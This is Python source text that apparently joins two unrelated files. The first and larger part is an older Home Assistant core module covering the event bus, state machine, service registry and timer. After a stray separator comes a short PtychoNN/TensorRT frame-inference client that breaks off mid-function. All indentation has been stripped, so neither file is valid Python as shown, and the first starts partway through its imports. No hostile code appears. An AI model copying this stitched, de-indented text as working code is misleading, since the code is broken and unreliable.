from homeassistant.const import (
ATTR_DOMAIN, ATTR_FRIENDLY_NAME, ATTR_NOW, ATTR_SERVICE,
ATTR_SERVICE_CALL_ID, ATTR_SERVICE_DATA, EVENT_CALL_SERVICE,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
EVENT_SERVICE_EXECUTED, EVENT_SERVICE_REGISTERED, EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED, MATCH_ALL, RESTART_EXIT_CODE,
SERVICE_HOMEASSISTANT_RESTART, SERVICE_HOMEASSISTANT_STOP, __version__)
from homeassistant.exceptions import (
HomeAssistantError, InvalidEntityFormatError)
from homeassistant.util.async import (
run_coroutine_threadsafe, run_callback_threadsafe)
import homeassistant.util as util
import homeassistant.util.dt as dt_util
import homeassistant.util.location as location
from homeassistant.util.unit_system import UnitSystem, METRIC_SYSTEM # NOQA
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
DOMAIN = "homeassistant"
# How often time_changed event should fire
TIMER_INTERVAL = 1 # seconds
# How long we wait for the result of a service call
SERVICE_CALL_LIMIT = 10 # seconds
# Define number of MINIMUM worker threads.
# During bootstrap of HA (see bootstrap._setup_component()) worker threads
# will be added for each component that polls devices.
MIN_WORKER_THREAD = 2
# Pattern for validating entity IDs (format: <domain>.<entity>)
ENTITY_ID_PATTERN = re.compile(r"^(\w+)\.(\w+)$")
# Interval at which we check if the pool is getting busy
MONITOR_POOL_INTERVAL = 30
_LOGGER = logging.getLogger(__name__)
def split_entity_id(entity_id: str) -> List[str]:
"""Split a state entity_id into domain, object_id."""
return entity_id.split(".", 1)
def valid_entity_id(entity_id: str) -> bool:
"""Test if an entity ID is a valid format."""
return ENTITY_ID_PATTERN.match(entity_id) is not None
def callback(func: Callable[..., None]) -> Callable[..., None]:
"""Annotation to mark method as safe to call from within the event loop."""
# pylint: disable=protected-access
func._hass_callback = True
return func
def is_callback(func: Callable[..., Any]) -> bool:
"""Check if function is safe to be called in the event loop."""
return '_hass_callback' in func.__dict__
class CoreState(enum.Enum):
"""Represent the current state of Home Assistant."""
not_running = "NOT_RUNNING"
starting = "STARTING"
running = "RUNNING"
stopping = "STOPPING"
def __str__(self) -> str:
"""Return the event."""
return self.value
class JobPriority(util.OrderedEnum):
"""Provides job priorities for event bus jobs."""
EVENT_CALLBACK = 0
EVENT_SERVICE = 1
EVENT_STATE = 2
EVENT_TIME = 3
EVENT_DEFAULT = 4
@staticmethod
def from_event_type(event_type):
"""Return a priority based on event type."""
if event_type == EVENT_TIME_CHANGED:
return JobPriority.EVENT_TIME
elif event_type == EVENT_STATE_CHANGED:
return JobPriority.EVENT_STATE
elif event_type == EVENT_CALL_SERVICE:
return JobPriority.EVENT_SERVICE
elif event_type == EVENT_SERVICE_EXECUTED:
return JobPriority.EVENT_CALLBACK
return JobPriority.EVENT_DEFAULT
class HomeAssistant(object):
"""Root object of the Home Assistant home automation."""
# pylint: disable=too-many-instance-attributes
def __init__(self, loop=None):
"""Initialize new Home Assistant object."""
self.loop = loop or asyncio.get_event_loop()
self.executor = ThreadPoolExecutor(max_workers=5)
self.loop.set_default_executor(self.executor)
self.pool = pool = create_worker_pool()
self.bus = EventBus(pool, self.loop)
self.services = ServiceRegistry(self.bus, self.add_job, self.loop)
self.states = StateMachine(self.bus, self.loop)
self.config = Config() # type: Config
self.state = CoreState.not_running
self.exit_code = None
@property
def is_running(self) -> bool:
"""Return if Home Assistant is running."""
return self.state in (CoreState.starting, CoreState.running)
def start(self) -> None:
"""Start home assistant."""
_LOGGER.info(
"Starting Home Assistant (%d threads)", self.pool.worker_count)
self.state = CoreState.starting
# Register the async start
self.loop.create_task(self.async_start())
def stop_homeassistant(*args):
"""Stop Home Assistant."""
self.exit_code = 0
self.async_add_job(self.async_stop)
def restart_homeassistant(*args):
"""Restart Home Assistant."""
self.exit_code = RESTART_EXIT_CODE
self.async_add_job(self.async_stop)
# Register the restart/stop event
self.loop.call_soon(
self.services.async_register,
DOMAIN, SERVICE_HOMEASSISTANT_STOP, stop_homeassistant
)
self.loop.call_soon(
self.services.async_register,
DOMAIN, SERVICE_HOMEASSISTANT_RESTART, restart_homeassistant
)
# Setup signal handling
if sys.platform != 'win32':
try:
self.loop.add_signal_handler(
signal.SIGTERM,
stop_homeassistant
)
except ValueError:
_LOGGER.warning('Could not bind to SIGTERM.')
try:
self.loop.add_signal_handler(
signal.SIGHUP,
restart_homeassistant
)
except ValueError:
_LOGGER.warning('Could not bind to SIGHUP.')
# Run forever and catch keyboard interrupt
try:
# Block until stopped
_LOGGER.info("Starting Home Assistant core loop")
self.loop.run_forever()
except KeyboardInterrupt:
self.loop.call_soon(stop_homeassistant)
self.loop.run_forever()
@asyncio.coroutine
def async_start(self):
"""Finalize startup from inside the event loop.
This method is a coroutine.
"""
# pylint: disable=protected-access
self.loop._thread_ident = threading.get_ident()
async_create_timer(self)
async_monitor_worker_pool(self)
self.bus.async_fire(EVENT_HOMEASSISTANT_START)
yield from self.loop.run_in_executor(None, self.pool.block_till_done)
self.state = CoreState.running
def add_job(self,
target: Callable[..., None],
*args: Any,
priority: JobPriority=JobPriority.EVENT_DEFAULT) -> None:
"""Add job to the worker pool.
target: target to call.
args: parameters for method to call.
"""
self.pool.add_job(priority, (target,) + args)
def async_add_job(self, target: Callable[..., None], *args: Any):
"""Add a job from within the eventloop.
target: target to call.
args: parameters for method to call.
"""
if is_callback(target):
self.loop.call_soon(target, *args)
elif asyncio.iscoroutinefunction(target):
self.loop.create_task(target(*args))
else:
self.add_job(target, *args)
def async_run_job(self, target: Callable[..., None], *args: Any):
"""Run a job from within the event loop.
target: target to call.
args: parameters for method to call.
"""
if is_callback(target):
target(*args)
else:
self.async_add_job(target, *args)
def _loop_empty(self):
"""Python 3.4.2 empty loop compatibility function."""
# pylint: disable=protected-access
if sys.version_info < (3, 4, 3):
return len(self.loop._scheduled) == 0 and \
len(self.loop._ready) == 0
else:
return self.loop._current_handle is None and \
len(self.loop._ready) == 0
def block_till_done(self):
"""Block till all pending work is done."""
complete = threading.Event()
@asyncio.coroutine
def sleep_wait():
"""Sleep in thread pool."""
yield from self.loop.run_in_executor(None, time.sleep, 0)
def notify_when_done():
"""Notify event loop when pool done."""
count = 0
while True:
# Wait for the work queue to empty
self.pool.block_till_done()
# Verify the loop is empty
if self._loop_empty():
count += 1
if count == 2:
break
# sleep in the loop executor, this forces execution back into
# the event loop to avoid the block thread from starving the
# async loop
run_coroutine_threadsafe(
sleep_wait(),
self.loop
).result()
complete.set()
threading.Thread(name="BlockThread", target=notify_when_done).start()
complete.wait()
def stop(self) -> None:
"""Stop Home Assistant and shuts down all threads."""
run_coroutine_threadsafe(self.async_stop(), self.loop)
@asyncio.coroutine
def async_stop(self) -> None:
"""Stop Home Assistant and shuts down all threads.
This method is a coroutine.
"""
self.state = CoreState.stopping
self.bus.async_fire(EVENT_HOMEASSISTANT_STOP)
yield from self.loop.run_in_executor(None, self.pool.block_till_done)
yield from self.loop.run_in_executor(None, self.pool.stop)
self.executor.shutdown()
self.state = CoreState.not_running
self.loop.stop()
class EventOrigin(enum.Enum):
"""Represent the origin of an event."""
local = "LOCAL"
remote = "REMOTE"
def __str__(self):
"""Return the event."""
return self.value
class Event(object):
# pylint: disable=too-few-public-methods
"""Represents an event within the Bus."""
__slots__ = ['event_type', 'data', 'origin', 'time_fired']
def __init__(self, event_type, data=None, origin=EventOrigin.local,
time_fired=None):
"""Initialize a new event."""
self.event_type = event_type
self.data = data or {}
self.origin = origin
self.time_fired = time_fired or dt_util.utcnow()
def as_dict(self):
"""Create a dict representation of this Event."""
return {
'event_type': self.event_type,
'data': dict(self.data),
'origin': str(self.origin),
'time_fired': self.time_fired,
}
def __repr__(self):
"""Return the representation."""
# pylint: disable=maybe-no-member
if self.data:
return "<Event {}[{}]: {}>".format(
self.event_type, str(self.origin)[0],
util.repr_helper(self.data))
else:
return "<Event {}[{}]>".format(self.event_type,
str(self.origin)[0])
def __eq__(self, other):
"""Return the comparison."""
return (self.__class__ == other.__class__ and
self.event_type == other.event_type and
self.data == other.data and
self.origin == other.origin and
self.time_fired == other.time_fired)
class EventBus(object):
"""Allows firing of and listening for events."""
def __init__(self, pool: util.ThreadPool,
loop: asyncio.AbstractEventLoop) -> None:
"""Initialize a new event bus."""
self._listeners = {}
self._pool = pool
self._loop = loop
def async_listeners(self):
"""Dict with events and the number of listeners.
This method must be run in the event loop.
"""
return {key: len(self._listeners[key])
for key in self._listeners}
@property
def listeners(self):
"""Dict with events and the number of listeners."""
return run_callback_threadsafe(
self._loop, self.async_listeners
).result()
def fire(self, event_type: str, event_data=None, origin=EventOrigin.local):
"""Fire an event."""
if not self._pool.running:
raise HomeAssistantError('Home Assistant has shut down.')
self._loop.call_soon_threadsafe(self.async_fire, event_type,
event_data, origin)
def async_fire(self, event_type: str, event_data=None,
origin=EventOrigin.local, wait=False):
"""Fire an event.
This method must be run in the event loop.
"""
# Copy the list of the current listeners because some listeners
# remove themselves as a listener while being executed which
# causes the iterator to be confused.
get = self._listeners.get
listeners = get(MATCH_ALL, []) + get(event_type, [])
event = Event(event_type, event_data, origin)
if event_type != EVENT_TIME_CHANGED:
_LOGGER.info("Bus:Handling %s", event)
if not listeners:
return
job_priority = JobPriority.from_event_type(event_type)
sync_jobs = []
for func in listeners:
if asyncio.iscoroutinefunction(func):
self._loop.create_task(func(event))
elif is_callback(func):
self._loop.call_soon(func, event)
else:
sync_jobs.append((job_priority, (func, event)))
# Send all the sync jobs at once
if sync_jobs:
self._pool.add_many_jobs(sync_jobs)
def listen(self, event_type, listener):
"""Listen for all events or events of a specific type.
To listen to all events specify the constant ``MATCH_ALL``
as event_type.
"""
future = run_callback_threadsafe(
self._loop, self.async_listen, event_type, listener)
future.result()
def remove_listener():
"""Remove the listener."""
self._remove_listener(event_type, listener)
return remove_listener
def async_listen(self, event_type, listener):
"""Listen for all events or events of a specific type.
To listen to all events specify the constant ``MATCH_ALL``
as event_type.
This method must be run in the event loop.
"""
if event_type in self._listeners:
self._listeners[event_type].append(listener)
else:
self._listeners[event_type] = [listener]
def remove_listener():
"""Remove the listener."""
self.async_remove_listener(event_type, listener)
return remove_listener
def listen_once(self, event_type, listener):
"""Listen once for event of a specific type.
To listen to all events specify the constant ``MATCH_ALL``
as event_type.
Returns function to unsubscribe the listener.
"""
@ft.wraps(listener)
def onetime_listener(event):
"""Remove listener from eventbus and then fire listener."""
if hasattr(onetime_listener, 'run'):
return
# Set variable so that we will never run twice.
# Because the event bus might have to wait till a thread comes
# available to execute this listener it might occur that the
# listener gets lined up twice to be executed.
# This will make sure the second time it does nothing.
setattr(onetime_listener, 'run', True)
remove_listener()
listener(event)
remove_listener = self.listen(event_type, onetime_listener)
return remove_listener
def async_listen_once(self, event_type, listener):
"""Listen once for event of a specific type.
To listen to all events specify the constant ``MATCH_ALL``
as event_type.
Returns registered listener that can be used with remove_listener.
This method must be run in the event loop.
"""
@ft.wraps(listener)
@asyncio.coroutine
def onetime_listener(event):
"""Remove listener from eventbus and then fire listener."""
if hasattr(onetime_listener, 'run'):
return
# Set variable so that we will never run twice.
# Because the event bus loop might have async_fire queued multiple
# times, its possible this listener may already be lined up
# multiple times as well.
# This will make sure the second time it does nothing.
setattr(onetime_listener, 'run', True)
self.async_remove_listener(event_type, onetime_listener)
if asyncio.iscoroutinefunction(listener):
yield from listener(event)
else:
job_priority = JobPriority.from_event_type(event.event_type)
self._pool.add_job(job_priority, (listener, event))
self.async_listen(event_type, onetime_listener)
return onetime_listener
def remove_listener(self, event_type, listener):
"""Remove a listener of a specific event_type. (DEPRECATED 0.28)."""
_LOGGER.warning('bus.remove_listener has been deprecated. Please use '
'the function returned from calling listen.')
self._remove_listener(event_type, listener)
def _remove_listener(self, event_type, listener):
"""Remove a listener of a specific event_type."""
future = run_callback_threadsafe(
self._loop,
self.async_remove_listener, event_type, listener
)
future.result()
def async_remove_listener(self, event_type, listener):
"""Remove a listener of a specific event_type.
This method must be run in the event loop.
"""
try:
self._listeners[event_type].remove(listener)
# delete event_type list if empty
if not self._listeners[event_type]:
self._listeners.pop(event_type)
except (KeyError, ValueError):
# KeyError is key event_type listener did not exist
# ValueError if listener did not exist within event_type
_LOGGER.warning('Unable to remove unknown listener %s',
listener)
class State(object):
"""Object to represent a state within the state machine.
entity_id: the entity that is represented.
state: the state of the entity
attributes: extra information on entity and state
last_changed: last time the state was changed, not the attributes.
last_updated: last time this object was updated.
"""
__slots__ = ['entity_id', 'state', 'attributes',
'last_changed', 'last_updated']
# pylint: disable=too-many-arguments
def __init__(self, entity_id, state, attributes=None, last_changed=None,
last_updated=None):
"""Initialize a new state."""
if not valid_entity_id(entity_id):
raise InvalidEntityFormatError((
"Invalid entity id encountered: {}. "
"Format should be <domain>.<object_id>").format(entity_id))
self.entity_id = entity_id.lower()
self.state = str(state)
self.attributes = MappingProxyType(attributes or {})
self.last_updated = last_updated or dt_util.utcnow()
self.last_changed = last_changed or self.last_updated
@property
def domain(self):
"""Domain of this state."""
return split_entity_id(self.entity_id)[0]
@property
def object_id(self):
"""Object id of this state."""
return split_entity_id(self.entity_id)[1]
@property
def name(self):
"""Name of this state."""
return (
self.attributes.get(ATTR_FRIENDLY_NAME) or
self.object_id.replace('_', ' '))
def as_dict(self):
"""Return a dict representation of the State.
To be used for JSON serialization.
Ensures: state == State.from_dict(state.as_dict())
"""
return {'entity_id': self.entity_id,
'state': self.state,
'attributes': dict(self.attributes),
'last_changed': self.last_changed,
'last_updated': self.last_updated}
@classmethod
def from_dict(cls, json_dict):
"""Initialize a state from a dict.
Ensures: state == State.from_json_dict(state.to_json_dict())
"""
if not (json_dict and 'entity_id' in json_dict and
'state' in json_dict):
return None
last_changed = json_dict.get('last_changed')
if isinstance(last_changed, str):
last_changed = dt_util.parse_datetime(last_changed)
last_updated = json_dict.get('last_updated')
if isinstance(last_updated, str):
last_updated = dt_util.parse_datetime(last_updated)
return cls(json_dict['entity_id'], json_dict['state'],
json_dict.get('attributes'), last_changed, last_updated)
def __eq__(self, other):
"""Return the comparison of the state."""
return (self.__class__ == other.__class__ and
self.entity_id == other.entity_id and
self.state == other.state and
self.attributes == other.attributes)
def __repr__(self):
"""Return the representation of the states."""
attr = "; {}".format(util.repr_helper(self.attributes)) \
if self.attributes else ""
return "<state {}={}{} @ {}>".format(
self.entity_id, self.state, attr,
dt_util.as_local(self.last_changed).isoformat())
class StateMachine(object):
"""Helper class that tracks the state of different entities."""
def __init__(self, bus, loop):
"""Initialize state machine."""
self._states = {}
self._bus = bus
self._loop = loop
def entity_ids(self, domain_filter=None):
"""List of entity ids that are being tracked."""
future = run_callback_threadsafe(
self._loop, self.async_entity_ids, domain_filter
)
return future.result()
def async_entity_ids(self, domain_filter=None):
"""List of entity ids that are being tracked."""
if domain_filter is None:
return list(self._states.keys())
domain_filter = domain_filter.lower()
return [state.entity_id for state in self._states.values()
if state.domain == domain_filter]
def all(self):
"""Create a list of all states."""
return run_callback_threadsafe(self._loop, self.async_all).result()
def async_all(self):
"""Create a list of all states.
This method must be run in the event loop.
"""
return list(self._states.values())
def get(self, entity_id):
"""Retrieve state of entity_id or None if not found.
Async friendly.
"""
return self._states.get(entity_id.lower())
def is_state(self, entity_id, state):
"""Test if entity exists and is specified state.
Async friendly.
"""
state_obj = self.get(entity_id)
return state_obj and state_obj.state == state
def is_state_attr(self, entity_id, name, value):
"""Test if entity exists and has a state attribute set to value.
Async friendly.
"""
state_obj = self.get(entity_id)
return state_obj and state_obj.attributes.get(name, None) == value
def remove(self, entity_id):
"""Remove the state of an entity.
Returns boolean to indicate if an entity was removed.
"""
return run_callback_threadsafe(
self._loop, self.async_remove, entity_id).result()
def async_remove(self, entity_id):
"""Remove the state of an entity.
Returns boolean to indicate if an entity was removed.
This method must be run in the event loop.
"""
entity_id = entity_id.lower()
old_state = self._states.pop(entity_id, None)
if old_state is None:
return False
event_data = {
'entity_id': entity_id,
'old_state': old_state,
'new_state': None,
}
self._bus.async_fire(EVENT_STATE_CHANGED, event_data)
return True
def set(self, entity_id, new_state, attributes=None, force_update=False):
"""Set the state of an entity, add entity if it does not exist.
Attributes is an optional dict to specify attributes of this state.
If you just update the attributes and not the state, last changed will
not be affected.
"""
run_callback_threadsafe(
self._loop,
self.async_set, entity_id, new_state, attributes, force_update,
).result()
def async_set(self, entity_id, new_state, attributes=None,
force_update=False):
"""Set the state of an entity, add entity if it does not exist.
Attributes is an optional dict to specify attributes of this state.
If you just update the attributes and not the state, last changed will
not be affected.
This method must be run in the event loop.
"""
entity_id = entity_id.lower()
new_state = str(new_state)
attributes = attributes or {}
old_state = self._states.get(entity_id)
is_existing = old_state is not None
same_state = (is_existing and old_state.state == new_state and
not force_update)
same_attr = is_existing and old_state.attributes == attributes
if same_state and same_attr:
return
# If state did not exist or is different, set it
last_changed = old_state.last_changed if same_state else None
state = State(entity_id, new_state, attributes, last_changed)
self._states[entity_id] = state
event_data = {
'entity_id': entity_id,
'old_state': old_state,
'new_state': state,
}
self._bus.async_fire(EVENT_STATE_CHANGED, event_data)
# pylint: disable=too-few-public-methods
class Service(object):
"""Represents a callable service."""
__slots__ = ['func', 'description', 'fields', 'schema',
'is_callback', 'is_coroutinefunction']
def __init__(self, func, description, fields, schema):
"""Initialize a service."""
self.func = func
self.description = description or ''
self.fields = fields or {}
self.schema = schema
self.is_callback = is_callback(func)
self.is_coroutinefunction = asyncio.iscoroutinefunction(func)
def as_dict(self):
"""Return dictionary representation of this service."""
return {
'description': self.description,
'fields': self.fields,
}
# pylint: disable=too-few-public-methods
class ServiceCall(object):
"""Represents a call to a service."""
__slots__ = ['domain', 'service', 'data', 'call_id']
def __init__(self, domain, service, data=None, call_id=None):
"""Initialize a service call."""
self.domain = domain.lower()
self.service = service.lower()
self.data = MappingProxyType(data or {})
self.call_id = call_id
def __repr__(self):
"""Return the represenation of the service."""
if self.data:
return "<ServiceCall {}.{}: {}>".format(
self.domain, self.service, util.repr_helper(self.data))
else:
return "<ServiceCall {}.{}>".format(self.domain, self.service)
class ServiceRegistry(object):
"""Offers services over the eventbus."""
def __init__(self, bus, add_job, loop):
"""Initialize a service registry."""
self._services = {}
self._add_job = add_job
self._bus = bus
self._loop = loop
self._cur_id = 0
run_callback_threadsafe(
loop,
bus.async_listen, EVENT_CALL_SERVICE, self._event_to_service_call,
)
@property
def services(self):
"""Dict with per domain a list of available services."""
return run_callback_threadsafe(
self._loop, self.async_services,
).result()
def async_services(self):
"""Dict with per domain a list of available services."""
return {domain: {key: value.as_dict() for key, value
in self._services[domain].items()}
for domain in self._services}
def has_service(self, domain, service):
"""Test if specified service exists."""
return service.lower() in self._services.get(domain.lower(), [])
# pylint: disable=too-many-arguments
def register(self, domain, service, service_func, description=None,
schema=None):
"""
Register a service.
Description is a dict containing key 'description' to describe
the service and a key 'fields' to describe the fields.
Schema is called to coerce and validate the service data.
"""
run_callback_threadsafe(
self._loop,
self.async_register, domain, service, service_func, description,
schema
).result()
def async_register(self, domain, service, service_func, description=None,
schema=None):
"""
Register a service.
Description is a dict containing key 'description' to describe
the service and a key 'fields' to describe the fields.
Schema is called to coerce and validate the service data.
This method must be run in the event loop.
"""
domain = domain.lower()
service = service.lower()
description = description or {}
service_obj = Service(service_func, description.get('description'),
description.get('fields', {}), schema)
if domain in self._services:
self._services[domain][service] = service_obj
else:
self._services[domain] = {service: service_obj}
self._bus.async_fire(
EVENT_SERVICE_REGISTERED,
{ATTR_DOMAIN: domain, ATTR_SERVICE: service}
)
def call(self, domain, service, service_data=None, blocking=False):
"""
Call a service.
Specify blocking=True to wait till service is executed.
Waits a maximum of SERVICE_CALL_LIMIT.
If blocking = True, will return boolean if service executed
succesfully within SERVICE_CALL_LIMIT.
This method will fire an event to call the service.
This event will be picked up by this ServiceRegistry and any
other ServiceRegistry that is listening on the EventBus.
Because the service is sent as an event you are not allowed to use
the keys ATTR_DOMAIN and ATTR_SERVICE in your service_data.
"""
return run_coroutine_threadsafe(
self.async_call(domain, service, service_data, blocking),
self._loop
).result()
@callback
def async_call(self, domain, service, service_data=None, blocking=False):
"""
Call a service.
Specify blocking=True to wait till service is executed.
Waits a maximum of SERVICE_CALL_LIMIT.
If blocking = True, will return boolean if service executed
succesfully within SERVICE_CALL_LIMIT.
This method will fire an event to call the service.
This event will be picked up by this ServiceRegistry and any
other ServiceRegistry that is listening on the EventBus.
Because the service is sent as an event you are not allowed to use
the keys ATTR_DOMAIN and ATTR_SERVICE in your service_data.
This method is a coroutine.
"""
call_id = self._generate_unique_id()
event_data = {
ATTR_DOMAIN: domain.lower(),
ATTR_SERVICE: service.lower(),
ATTR_SERVICE_DATA: service_data,
ATTR_SERVICE_CALL_ID: call_id,
}
if blocking:
fut = asyncio.Future(loop=self._loop)
@callback
def service_executed(event):
"""Callback method that is called when service is executed."""
if event.data[ATTR_SERVICE_CALL_ID] == call_id:
fut.set_result(True)
unsub = self._bus.async_listen(EVENT_SERVICE_EXECUTED,
service_executed)
self._bus.async_fire(EVENT_CALL_SERVICE, event_data)
if blocking:
done, _ = yield from asyncio.wait([fut], loop=self._loop,
timeout=SERVICE_CALL_LIMIT)
success = bool(done)
unsub()
return success
@asyncio.coroutine
def _event_to_service_call(self, event):
"""Callback for SERVICE_CALLED events from the event bus."""
service_data = event.data.get(ATTR_SERVICE_DATA) or {}
domain = event.data.get(ATTR_DOMAIN).lower()
service = event.data.get(ATTR_SERVICE).lower()
call_id = event.data.get(ATTR_SERVICE_CALL_ID)
if not self.has_service(domain, service):
if event.origin == EventOrigin.local:
_LOGGER.warning('Unable to find service %s/%s',
domain, service)
return
service_handler = self._services[domain][service]
def fire_service_executed():
"""Fire service executed event."""
if not call_id:
return
data = {ATTR_SERVICE_CALL_ID: call_id}
if (service_handler.is_coroutinefunction or
service_handler.is_callback):
self._bus.async_fire(EVENT_SERVICE_EXECUTED, data)
else:
self._bus.fire(EVENT_SERVICE_EXECUTED, data)
try:
if service_handler.schema:
service_data = service_handler.schema(service_data)
except vol.Invalid as ex:
_LOGGER.error('Invalid service data for %s.%s: %s',
domain, service, humanize_error(service_data, ex))
fire_service_executed()
return
service_call = ServiceCall(domain, service, service_data, call_id)
if service_handler.is_callback:
service_handler.func(service_call)
fire_service_executed()
elif service_handler.is_coroutinefunction:
yield from service_handler.func(service_call)
fire_service_executed()
else:
def execute_service():
"""Execute a service and fires a SERVICE_EXECUTED event."""
service_handler.func(service_call)
fire_service_executed()
self._add_job(execute_service, priority=JobPriority.EVENT_SERVICE)
def _generate_unique_id(self):
"""Generate a unique service call id."""
self._cur_id += 1
return "{}-{}".format(id(self), self._cur_id)
class Config(object):
"""Configuration settings for Home Assistant."""
# pylint: disable=too-many-instance-attributes
def __init__(self):
"""Initialize a new config object."""
self.latitude = None # type: Optional[float]
self.longitude = None # type: Optional[float]
self.elevation = None # type: Optional[int]
self.location_name = None # type: Optional[str]
self.time_zone = None # type: Optional[str]
self.units = METRIC_SYSTEM # type: UnitSystem
# If True, pip install is skipped for requirements on startup
self.skip_pip = False # type: bool
# List of loaded components
self.components = []
# Remote.API object pointing at local API
self.api = None
# Directory that holds the configuration
self.config_dir = None
def distance(self: object, lat: float, lon: float) -> float:
"""Calculate distance from Home Assistant."""
return self.units.length(
location.distance(self.latitude, self.longitude, lat, lon), 'm')
def path(self, *path):
"""Generate path to the file within the config dir."""
if self.config_dir is None:
raise HomeAssistantError("config_dir is not set")
return os.path.join(self.config_dir, *path)
def as_dict(self):
"""Create a dict representation of this dict."""
time_zone = self.time_zone or dt_util.UTC
return {
'latitude': self.latitude,
'longitude': self.longitude,
'unit_system': self.units.as_dict(),
'location_name': self.location_name,
'time_zone': time_zone.zone,
'components': self.components,
'config_dir': self.config_dir,
'version': __version__
}
def async_create_timer(hass, interval=TIMER_INTERVAL):
"""Create a timer that will start on HOMEASSISTANT_START."""
stop_event = asyncio.Event(loop=hass.loop)
# Setting the Event inside the loop by marking it as a coroutine
@callback
def stop_timer(event):
"""Stop the timer."""
stop_event.set()
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_timer)
@asyncio.coroutine
def timer(interval, stop_event):
"""Create an async timer."""
_LOGGER.info("Timer:starting")
last_fired_on_second = -1
calc_now = dt_util.utcnow
while not stop_event.is_set():
now = calc_now()
# First check checks if we are not on a second matching the
# timer interval. Second check checks if we did not already fire
# this interval.
if now.second % interval or \
now.second == last_fired_on_second:
# Sleep till it is the next time that we have to fire an event.
# Aim for halfway through the second that fits TIMER_INTERVAL.
# If TIMER_INTERVAL is 10 fire at .5, 10.5, 20.5, etc seconds.
# This will yield the best results because time.sleep() is not
# 100% accurate because of non-realtime OS's
slp_seconds = interval - now.second % interval + \
.5 - now.microsecond/1000000.0
yield from asyncio.sleep(slp_seconds, loop=hass.loop)
now = calc_now()
last_fired_on_second = now.second
# Event might have been set while sleeping
if not stop_event.is_set():
try:
# Schedule the bus event
hass.loop.call_soon(
hass.bus.async_fire,
EVENT_TIME_CHANGED,
{ATTR_NOW: now}
)
except HomeAssistantError:
# HA raises error if firing event after it has shut down
break
@asyncio.coroutine
def start_timer(event):
"""Start our async timer."""
hass.loop.create_task(timer(interval, stop_event))
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, start_timer)
def create_worker_pool(worker_count=None):
"""Create a worker pool."""
if worker_count is None:
worker_count = MIN_WORKER_THREAD
def job_handler(job):
"""Called whenever a job is available to do."""
try:
func, *args = job
func(*args)
except Exception: # pylint: disable=broad-except
# Catch any exception our service/event_listener might throw
# We do not want to crash our ThreadPool
_LOGGER.exception("BusHandler:Exception doing job")
return util.ThreadPool(job_handler, worker_count)
def async_monitor_worker_pool(hass):
"""Create a monitor for the thread pool to check if pool is misbehaving."""
busy_threshold = hass.pool.worker_count * 3
handle = None
def schedule():
"""Schedule the monitor."""
nonlocal handle
handle = hass.loop.call_later(MONITOR_POOL_INTERVAL,
check_pool_threshold)
def check_pool_threshold():
"""Check pool size."""
nonlocal busy_threshold
pending_jobs = hass.pool.queue_size
if pending_jobs < busy_threshold:
schedule()
return
_LOGGER.warning(
"WorkerPool:All %d threads are busy and %d jobs pending",
hass.pool.worker_count, pending_jobs)
for start, job in hass.pool.current_jobs:
_LOGGER.warning("WorkerPool:Current job started at %s: %s",
dt_util.as_local(start).isoformat(), job)
busy_threshold *= 2
schedule()
schedule()
@callback
def stop_monitor(event):
"""Stop the monitor."""
handle.cancel()
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_monitor)
|
main-edge-sm-test.py | import time, queue, threading, sys, os
import torch, argparse, logging
from pvaccess import Channel
from pvaccess import PvObject
import pvaccess as pva
import numpy as np
import tensorrt as trt
sys.path.insert(1, '/home/nvidia-agx/Inference/')
import PtychoNN
from framePreProcess import *
from tensorrtcode_batch import *
class pvaClient:
def __init__(self, nth=1):
self.last_uid = None
self.n_missed = 0
self.n_received = None
self.frame_dims = (516, 516)
self.debug_frame = np.zeros((128,128), dtype=np.int32)
self.frame_id = None
self.trt_engine_path = 'auto_PtychoNN_sm.trt'
self.resolution = (64,64)
self.server = pva.PvaServer()
self.channel_name = 'pvapy:image1'
#self.channel_name_infer = 'pvapy:image2'
self.server.addRecord(self.channel_name, pva.NtNdArray())
self.current_frame_id = 0
self.frame_map={}
self.n_generated_frames = 2
self.rows = 128
self.cols = 128
self.rows1 = 128
self.cols1 = 128
self.trt_outputs = ()
self.max_batch_size = 1
self.base_seq_id = None
self.frames_processed =0
self.trt_inference_wrapper = TRTInference(self.trt_engine_path,
trt_engine_datatype=trt.DataType.FLOAT,
batch_size=self.max_batch_size)
self.frame_tq = queue.Queue(maxsize=-1)
self.processed_tq = queue.Queue(maxsize=-1)
self.frame_id_tq = queue.Queue(maxsize=-1)
self.thr_exit = 0
self.recv_frames = None
self.avg_times = 0
for _ in range(nth):
threading.Thread(target=self.frame_process, daemon=True).start()
def frame_producer(self, frame_id, trt_outputs1, extraFieldsPvObject=None):
#for frame_id in range(0, self.n_generated_frames):
if extraFieldsPvObject is None:
nda = pva.NtNdArray()
else:
nda = pva.NtNdArray(extraFieldsPvObject.getStructureDict())
nda['uniqueId'] = frame_id
nda['codec'] = pva.PvCodec('pvapyc', pva.PvInt(5))
dims = [pva.PvDimension(self.rows, 0, self.rows, 1, False), \
pva.PvDimension(self.cols, 0, self.cols, 1, False)]
nda['dimension'] = dims
nda['compressedSize'] = self.rows*self.cols
nda['uncompressedSize'] = self.rows*self.cols
ts = self.get_timestamp()
nda['timeStamp'] = ts
nda['dataTimeStamp'] = ts
nda['descriptor'] = 'PvaPy Simulated Image'
nda['value'] = {'floatValue': trt_outputs1.flatten()}
attrs = [pva.NtAttribute('ColorMode', pva.PvInt(0))]
nda['attribute'] = attrs
if extraFieldsPvObject is not None:
nda.set(extraFieldsPvObject)
#self.frame_map[frame_id] = nda
return nda
def get_timestamp(self):
s = time.time()
ns = int((s-int(s))*1000000000)
s = int(s)
return pva.PvTimeStamp(s,ns)
def frame_process(self, ):
while self.thr_exit == 0:
try:
pv = self.frame_tq.get(block=True, timeout=1)
except queue.Empty:
continue
#logging.error("Queue is empty")
except:
#logging.error("Something else of the Queue went wrong")
continue
frm_id= pv['uniqueId']
dims = pv['dimension']
rows = dims[0]['size']
cols = dims[1]['size']
frame = pv['value'][0]['shortValue'].reshape((rows, cols))
self.frame_tq.task_done()
time0 = time.time()
processed_frame, pr_frm_id = frame_preprocess(frame, frm_id)
#print(processed_frame.max())
#print(processed_frame.sum())
#self.server.update(self.channel_name, self.frame_producer(frm_id, processed_frame))
#processed_frame = self.debug_frames
print("Time for pre-processing ", (time.time()-time0))
#for _pf in processed_frame:
self.processed_tq.put(processed_frame)
